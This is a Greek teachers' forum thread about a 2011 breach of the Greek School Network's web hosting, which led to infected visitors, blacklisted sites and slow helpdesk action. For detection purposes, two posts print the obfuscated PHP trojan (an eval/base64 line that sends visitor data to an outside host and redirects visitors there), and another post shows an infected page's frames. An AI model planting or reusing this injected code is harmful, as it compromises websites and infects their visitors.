Παραβίαση ασφαλείας των σελίδων του ΠΣΔ

Ξεκίνησε από alkisg, 14 Απρ 2011, 10:17:03 ΜΜ

« προηγούμενο - επόμενο »

alkisg

Σήμερα για κάποιες ώρες το φόρουμ είχε παραβιαστεί, πιθανώς λόγω κάποιου κενού ασφαλείας του SMF.
Το αποτέλεσμα ήταν ότι σε κάθε επίσκεψη ο χρήστης μεταφερόταν για λίγο σε κάποια άλλη σελίδα που είχε το "TrojanDownloader:Java/Exdoer", και ανάλογα με το λειτουργικό, τον browser και το αντιιικό του υπήρχε περίπτωση να κολλήσει.

Επανέφερα το φόρουμ όπως ήταν πριν την παραβίαση, αλλά δεν έχει ακόμα ανακοινωθεί κάποιο κενό ασφαλείας από την εταιρία Simple Machines που αναπτύσσει το λογισμικό SMF του φόρουμ, ούτε έχει βγει κάποια διόρθωση, επομένως δεν υπάρχει εγγύηση ότι αυτό δεν θα ξανασυμβεί.

Έτσι για τις επόμενες μέρες καλό θα είναι οι χρήστες του φόρουμ να είναι προσεκτικοί κατά την επίσκεψή τους.

poursali

και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

dim

Παράθεση από: alkisg στις 14 Απρ 2011, 10:17:03 ΜΜ
....
Παράθεση από: poursali στις 14 Απρ 2011, 10:32:11 ΜΜ
καλύτερα να περιορίσουν τη χρήση του υπολογιστή
να είναι προσεκτικοί κατά την επίσκεψή τους.
Τι ακριβώς δηλαδή να κάνουμε?
Πως γίνεται το να είμαι προσεκτική κατά την επίσκεψή μου...    και πως γίνεται να περιορίσω τη χρήση...
Υπάρχει κάποιο χαπάκι....... αντιβίωση ίσως?

nikosx

εγώ πάντως κόλλησα πολύ πράγμα και ο desktop έχει σχεδόν πεθάνει :(
Νίκος Ξένος
Καθηγητής Πληροφορικής
nxenos@sch.gr

poursali

μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

evry

http://www.geekpolice.net/t26522-remove-ms-removal-tool-removal-guide

το παραπάνω το δοκίμασα γιατί κόλλησε ο ένας υπολογιστής και είναι οκ.

με το linux δεν υπάρχει πρόβλημα
What I cannot create I do not understand -- Richard Feynman
http://evripides.mysch.gr

pgrontas

Παράθεση από: poursali στις 14 Απρ 2011, 10:32:11 ΜΜ
και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...
Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.
Programs must be written for people to read, and only incidentally for machines to execute - Harold Abelson

poursali

Παράθεση από: pgrontas στις 14 Απρ 2011, 11:43:26 ΜΜ
Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.

ίσως είχε προλάβει το δικό σου να ενημερωθεί :)
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

petrosp13

Δημιούργησε χοντρό πρόβλημα αυτό που κατέβαινε από την σελίδα, αλλά το επανέφερα σε safe mode
Δεν άφηνε κανένα πρόγραμμα να ανοίξει, δεν άφηνε το CTRL+ALT+DEL, έκλεισε ακόμα και τα υπάρχοντα προγράμματα
Παπαδόπουλος Πέτρος
Καθηγητής Πληροφορικής

tom

Θωμάς Σκυλογιάννης

- Ζήσε σα να' ταν να πεθάνεις αύριο. Μάθε σα να' ταν να ζεις για πάντα.
                                                                                     Μαχάτμα Γκάντι

amichail

Και εμένα το έπιασε το avast antivirus. Αλλά είχε όλο το sch.gr πρόβλημα, δεν έμπαινε ούτε στο webmail ούτε πουθενά. Ούτε και σε πολλές άλλες σελίδες.
Αφού για μια στιγμή σκέφτηκα μήπως ήταν false positive.
Μετά άλλαξα σε Ubuntu, έψαξα ανενόχλητη πλέον στο google και είδα ότι έχει κάνει μεγάλη ζημιά ... άρχισε κατά κύματα και ήταν πλέον σε μορφή χιονοστιβάδας.
Για μένα θα πω μόνο ότι είμαι ο τύπος του δασκάλου που αν κάνω ένα μάθημα για 50η φορά θα αλλάξω για 52η φορά τις σημειώσεις μου

geokra

Παράθεση από: poursali στις 14 Απρ 2011, 10:50:12 ΜΜ
μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα
Και γω το ίδιο κόλλησα, αλλά είναι και λίγο επίμονο το άτιμο, δεν βγαίνει και εύκολα.

Λάμπρος Μπουκουβάλας

εγώ δεν αντιμετώπισα κανένα πρόβλημα.
πρέπει να το παραδεχθείτε, έχω τον καλύτερο και ασφαλέστερο υπολογιστή του κόσμου!  ;D
Λάμπρος Μπουκουβάλας
MSc - MRes

http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  (που τον διαβάζουν οι ξένοι, αλλά όχι εμείς)  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται...

alkisg

Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:
Κώδικας: php
<?php
eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?><?php και εδώ συνεχίζει το αρχικό αρχείο...


Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.

new2011

Καλησπέρα,
Το web site του Π. Τσιωτάκη βγάζει  το εξής μήνυμα :

Προειδοποίηση- η επίσκεψη σε αυτόν τον ιστότοπο μπορεί να προκαλέσει ζημία στον υπολογιστή σας!

Τι συμβαίνει ????

alkisg

Μάλλον αυτό: https://alkisg.mysch.gr/steki/index.php?topic=3846.msg40550#msg40550

Πρέπει επιτέλους να πάρουν κεντρικά μέτρα από το ΠΣΔ, έχει 15 μέρες πια η ιστορία με την παραβίαση ασφαλείας του και ούτε έλυσαν το πρόβλημα, ούτε ανακοίνωση δεν έκαναν ακόμα...

P.Tsiotakis

το βγάζει σε πολλούς ιστότοπους του ΠΣΔ, συνάδελφε
και στο στέκι κάθε φορά που το επισκέπτομαι

περιμένω τη  επαναφορά και γω...κάποια στιγμή είδα τα αρχεία αλλά όχι τη βάση δεδομένων
ίδωμεν

alkisg

Παναγιώτη από το στέκι έχω αφαιρέσει μόνος μου τον trojan, ενώ στο site σου παραμένει.
Καλύτερα θα είναι να τον βγάλεις κι εσύ, γιατί από το ΠΣΔ μπορεί να αργήσουν...

Στέκι, όλα καλά:
$ wget -q https://alkisg.mysch.gr/steki/ -O -

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<link rel="stylesheet" type="text/css" href="https://alkisg.mysch.gr/steki/Themes/default/css/index.css?rc5" />
...κτλ κτλ


Site σου, μολυσμένο:
$ wget -q http://users.sch.gr/ptsiotakis/ -O -

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Security report #1186 / 2011-04-28</title>
</head>
<frameset rows="*,20">
<frame src="http://nimelts.cz(bad).cc/downloads/">
<frame src="http://nimelts.cz(bad).cc/xp/index.php?tp=3fb41d99137405e1" noresize scrolling="no">

</frameset>
</html>


Το (bad) το έβαλα επίτηδες για να μην πάει κάποιος κατά λάθος εκεί και κολλήσει.
Μπες με ftp στο site σου και δες ποιο .php αρχείο έχει αλλαχθεί στις 13/4...
Btw ο injected php κώδικας έχει κάποιον έλεγχο και κάνει redirect στο cz.cc μόνο μερικές φορές, όχι πάντα, οπότε το wget μπορεί να μην δείχνει πάντα το ανεπιθύμητο url.


Το προειδοποιητικό μήνυμα που βγάζουν οι browsers είναι άλλο θέμα, αφορά γενικά το users.sch.gr/* λόγω των συχνών εμφανίσεων του trojan σε αρκετούς χρήστες (υποφακέλους). Οπότε θα συνεχίσει να εμφανίζεται μέχρι το ΠΣΔ να καθαρίσει εντελώς και να βγει από την blacklist. Στο μεταξύ όμως καλό είναι τουλάχιστον εμείς οι Πληροφορικοί που έχουμε την τεχνογνωσία, να αφαιρέσουμε τον trojan από τις σελίδες μας, για να μην κολλάμε τους επισκέπτες...

pfan

Επειδή είχα πρόβλημα και στο δικό μου σχολείο καθάρισα (με τη βοήθεια του Άλκη) τις σελίδες και άνοιξα ένα δελτίο στο helpdesk.sch.gr για να αναφέρω το πρόβλημα και ότι παρατηρείται και σε άλλα σχολεία. Η απάντηση που πήρα ήταν ότι πρέπει να δηλώσω σε ποια σχολεία υπάρχει το πρόβλημα. Οπότε καλό είναι όσοι έχουν το πρόβλημα να ανοίξουν ένα δελτίο στο helpdesk.

@Άλκη μήπως το θέμα αυτό να φύγει από την ΑΕΠΠ

(Χρόνια πολλά σε όλους!!!)
Πύρζα Φανή
Καθηγήτρια Πληροφορικής

Λάμπρος Μπουκουβάλας

Είχα κι εγώ πρόβλημα στο http://users.sch.gr/lambrosbouk
Έστειλα ένα τεχνικό δελτίο μέσα στη Μεγάλη Εβδομάδα και ο Θοδωρής Μπρότσης από το παν. Θεσσαλίας μου έλυσε το πρόβλημα την επόμενη μέρα.
Λάμπρος Μπουκουβάλας
MSc - MRes

http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  (που τον διαβάζουν οι ξένοι, αλλά όχι εμείς)  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται...

alkisg

Λάμπρο μου εφόσον είχαν τρύπα ασφαλείας στο web hosting τους και γέμισε ο σκληρός τους δίσκος με τον trojan, ας κάνουν μια μαζική εύρεση και διαγραφή του κώδικά του και να τον διώξουν σε 2 λεπτά.
Δεν χρειάζεται να περιμένουν τον κάθε χρήστη του ΠΣΔ που έχει αρχεία .php να καταλάβει ότι έχει κολλήσει trojan και να το αναφέρει στο helpdesk. Η πλειονότητα των χρηστών του ΠΣΔ δεν είναι Πληροφορικοί και δεν είναι σίγουρο ότι θα καταλάβουν και θα αναφέρουν το πρόβλημα. Μάλιστα και αρκετοί Πληροφορικοί μπορεί να μην καταλάβουν ότι φταίει το site τους, ή να περιμένουν να διορθωθεί από μόνο του.

Αν δεν λάβουν κεντρικά μέτρα το καθάρισμα θα διαρκέσει μήνες, και στο μεταξύ το users.sch.gr ήδη έχει μπει σε blacklist και μας επηρεάζει όλους.

Προσωπικά όμως σημαντικότερο λάθος τους θεωρώ το ότι δεν βγήκαν να παραδεχτούν την παραβίαση ασφαλείας, και να ειδοποιήσουν τους χρήστες ότι όλα τα δεδομένα τους μπορεί να έχουν πέσει σε ξένα χέρια. Κάποιος ξένος είχε πρόσβαση σε όλο το file system του server. Είναι σοβαρά πράγματα αυτά, θα έπρεπε να είχαν λυθεί από την πρώτη μέρα, όχι να συζητάμε για τα αυτονόητα 15 μέρες μετά.

P.Tsiotakis


Λάμπρος Μπουκουβάλας

Άλκη, συμφωνώ με όσα γράφεις.

Μου ήρθε το παρακάτω mail στις 22/4:

Λάμπρος Μπουκουβάλας
MSc - MRes

http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  (που τον διαβάζουν οι ξένοι, αλλά όχι εμείς)  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται...

pmouz

Παράθεση από: alkisg στις 26 Απρ 2011, 10:44:13 ΠΜ
Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:
Κώδικας: php
<?php
eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?><?php και εδώ συνεχίζει το αρχικό αρχείο...


Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.

Και στην προσωπική μου ιστοσελίδα στο sch  είχε πάει στο configuration.php και είχε βάλει το eval(...) στην αρχή του αρχείου με αποτέλεσμα να φορτώνει κάποια άλλη ιστοσελίδα. Όποιος το έκανε να του καεί ο υπολογιστής...

Keep Growing

"...maintenance downtime or capacity problems", με την υπομονή και τα νεύρα μας.

Γιατί δε λένε: "joomla και wordpress (php γενικά) απαγορεύονται στο ΠΣΔ", ώστε και μεις να βρούμε την υγειά μας αλλά και το "ψηφιακό σχολείο" να χτιστεί από primitive programmers.  :-\
Ο Έρωτας (του Εκπ/κου Πληροφορικού) στ' αλώνια της καλδέρας (του υπνωτισμού).

amichail

Λυπάμαι που το λέω, αλλά τόσες μέρες μετά τον ιό, εξακολουθεί να μου βγάζει προειδοποίηση για ορισμένα θέματα στο ΣΤΕΚΙ.
Κοινό χαρακτηριστικό τους έχουν ότι σε όλα περιλαμβάνεται ανάρτηση του κου Τσιωτάκη.
Απ΄όσο μπορώ να δω, σε όσα δεν έχει καταθέσει ακόμα την (πολύτιμη) άποψη του δεν μου βγάζει προειδοποίηση.
Παίζει κάτι με το προφίλ π.χ.; έχει σύνδεση με το site που ειρήσθω εν παρόδω δυστυχώς βγάζει ακόμα και αυτό το ίδιο μήνυμα;
ρωτάω εγώ η άσχετη  ???

το μήνυμα εν τω μεταξύ λέει γενικά για το users.sch.gr

Κε Τσιωτάκη, η επαναφορά που περιμένατε έγινε ή μάλλον ακόμα; Να πιέσουμε κι εμείς το helpdesk;

Μήπως έχω εγώ το πρόβλημα;
Για μένα θα πω μόνο ότι είμαι ο τύπος του δασκάλου που αν κάνω ένα μάθημα για 50η φορά θα αλλάξω για 52η φορά τις σημειώσεις μου

P.Tsiotakis

εμένα και στο στέκι μου βγάζει μήνυμα για "κακόβουλο σιτε" κάθε φορά που το επισκέπτομαι (πατώ συνέχεια και εισέρχομαι)
από τη δική μου ιστοσελίδα "κατέβασα" το wordpress (php κομμάτι) και είναι όλες στατικές html σελίδες

φυσικά, μπορείς να στείλεις μήνυμα και συ στο helpdesk...

Παναγιώτης

alkisg

Απ' όσο έχω καταλάβει, από την υπηρεσία safebrowsing του google ο ιστοχώρος http://users.sch.gr/ptsiotakis θεωρείται κακόβουλος και γι' αυτό μπλοκάρει όποιες σελίδες έχουν παραπομπή σε αυτόν:
http://www.google.com/safebrowsing/diagnostic?site=users.sch.gr/ptsiotakis

Ο δικός μου καθώς και το στέκι δεν χαρακτηρίστηκαν ως κακόβουλοι, πιθανώς επειδή έβγαλα άμεσα τον trojan:
http://www.google.com/safebrowsing/diagnostic?site=alkisg.mysch.gr
http://www.google.com/safebrowsing/diagnostic?site=alkisg.mysch.gr/steki

Αυτή η υπηρεσία safebrowsing χρησιμοποιείται και από τον Firefox και από τον Google chrome:
http://www.google.com/tools/firefox/safebrowsing/

Για να σταματήσει κάποιος ιστοχώρος να θεωρείται κακόβουλος, η google λέει ότι πρέπει να γίνει:
Παράθεση από: http://www.google.gr/webmasters/docs/faq.html
Αίτηση επανεξέτασης ιστοτόπου για κακόβουλο λογισμικό

Αφού ελέγξετε τον ιστότοπό σας και βεβαιωθείτε ότι είναι καθαρός, μπορείτε να υποβάλετε αίτημα προς επανεξέταση. Λάβετε υπόψη ότι θα χρειαστεί να επαληθεύσετε την κατοχή του ιστότοπου για να μπορέσετε να ζητήσετε να γίνει εξέτασή του.
...


Οπότε Παναγιώτη θα πρότεινα (1) να κάνεις τα παραπάνω που λέει η google για να σταματήσει το site σου να θεωρείται κακόβουλο, (2) να βγάλεις για λίγες μέρες το website σου από το προφίλ σου ώστε να μην υπάρχουν links από το στέκι στο site σου ώστε εν τέλει να μην βγαίνουν προειδοποιήσεις στα άλλα μέλη (και μετά από λίγες μέρες το ξαναβάζεις), και (3) και βασικότερο, να τα ψάλλεις στο helpdesk γιατί προφανώς θα έπρεπε να είχαν βγάλει τον trojan από την πρώτη μέρα και όχι να τον έχουν και να τον θρέφουνε ακόμα και να μας παιδεύουν όλους...  ;D


Εγώ απορώ γιατί δεν βγήκαν ακόμα να παραδεχτούν ότι υπήρξε (και ακόμα υπάρχει) παραβίαση ασφαλείας του server και να ενημερώσουν τους χρήστες του ΠΣΔ ότι τα δεδομένα τους μπορεί να έχουν κλαπεί, οπότε τουλάχιστον να αλλάξουμε κωδικούς, ενώ αν είχαμε online ευαίσθητα δεδομένα όπως πληροφορίες για web banking ή πιστωτικές να λάβουμε τα μέτρα μας, κτλ κτλ... μου φαίνεται εντελώς απαράδεκτος ο χειρισμός του γεγονότος.

P.Tsiotakis

έκανα τα 1 και 2

δεν είχα ασχοληθεί με τη google, καθώς ο τελευταίος έλεγχος ήταν στις 21/4 και θεωρούσα ότι θα κάνει έλεγχο ξανά!!

Λάμπρος Μπουκουβάλας

πάντως εγώ ΔΕΝ είχα κανένα πρόβλημα με το στέκι, ούτε με τη σελίδα του Παναγιώτη, μετά τις διορθώσεις που έγιναν τη Μ. Εβδομάδα. το μόνο που βαρέθηκα να βλέπω στην οθόνη μου, είναι το γνωστό "proxy error"...
Λάμπρος Μπουκουβάλας
MSc - MRes

http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  (που τον διαβάζουν οι ξένοι, αλλά όχι εμείς)  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται...

P.Tsiotakis


alkisg

ΟΚ, συγχώνευσα το θέμα με το "κεντρικό" περί της παραβίασης ασφαλείας του ΠΣΔ.

Gnirut

Παράθεση από: alkisg στις 04 Μαΐου 2011, 09:26:28 ΜΜ
ΟΚ, συγχώνευσα το θέμα με το "κεντρικό" περί της παραβίασης ασφαλείας του ΠΣΔ.

Το ΠΣΔ ώρες-ώρες φαίνεται να πνεει τα λοίσθια πλέον. Μπορεί να είναι πεσμένο για ώρες μέσα στην ημέρα, να έχει μειωμένη ταχύτητα και να βρίθει ιών και άλλων ευγενών προγραμμάτων. Ποιος έχει την γενική εποπτεία του;

Δημήτρης Κανάς

Πάντως να αναγνωρίσουμε πως το (μεγάλο) πρόβλημα είναι στις υπηρεσίες φιλοξενίας και όχι πρόσβασης στο διαδίκτυο από τα σχολεία... 

Δε ξέρω από ταχύτητες...
Powered by Elxis : LabSchool.mysch.gr

Νίκος Αδαμόπουλος

Αγαπητοί χρήστες του Πανελλήνιου Σχολικού Δικτύου,

θα θέλαμε να σας ενημερώσουμε, πως για λόγους ασφαλείας προβήκαμε σε αλλαγή των δικαιωμάτων των αρχείων σε 644 (read+write owner, read group, read other) και σε 755 των φακέλων (read+write+execute owner, read+execute group, read+execute other). Η αλλαγή αυτή ήταν αναγκαία λόγω της αλλοίωσης αρκετών ιστοσελίδων που παρουσιάστηκε το τελευταίο διάστημα. Σε αρκετές από αυτές τις ιστοσελίδες διαπιστώθηκε προσθήκη κακόβουλου κώδικα, γεγονός που οφείλεται σε λανθασμένα δικαιώματα των php αρχείων. Συνεπώς η ρύθμιση των δικαιωμάτων ήταν αναγκαία ενέργεια, καθώς απαιτείται και από τον νέο μηχανισμό ασφαλείας suPHP που εφαρμόζεται από το Πανελλήνιο Σχολικό Δίκτυο. Σε διαφορετική περίπτωση εμφανίζεται το μήνυμα "Internal Server Error".

Για τους παραπάνω λόγους συνιστούμε να μη γίνεται ρύθμιση των δικαιωμάτων των αρχείων και των φακέλων σε 777 (read+write+execute από όλους), καθώς υπάρχει μεγάλος κίνδυνος αλλοίωσης  και δυσλειτουργία της Ιστοσελίδας.

H ορθή ρύθμιση  είναι:

Για  τα αρχεία              644 ( rw-.r--.r-- ) 
Για  τα Directories:      755  ( rwx.r-x.r-x ) 

Υπενθυμίζουμε επίσης πως πρέπει να γίνονται αναβαθμίσεις των CMS πακέτων στις νεότερες εκδόσεις, όταν αυτές διατίθενται, καθώς αποσκοπούν στην διόρθωση κενών ασφαλείας των προηγούμενων εκδόσεων.  Επίσης προτείνουμε  την περιοδική αλλαγή του κωδικού πρόσβασης (password) στο λογαριασμό σας και τον ορισμό ενός δύσκολα προβλέψιμου password.

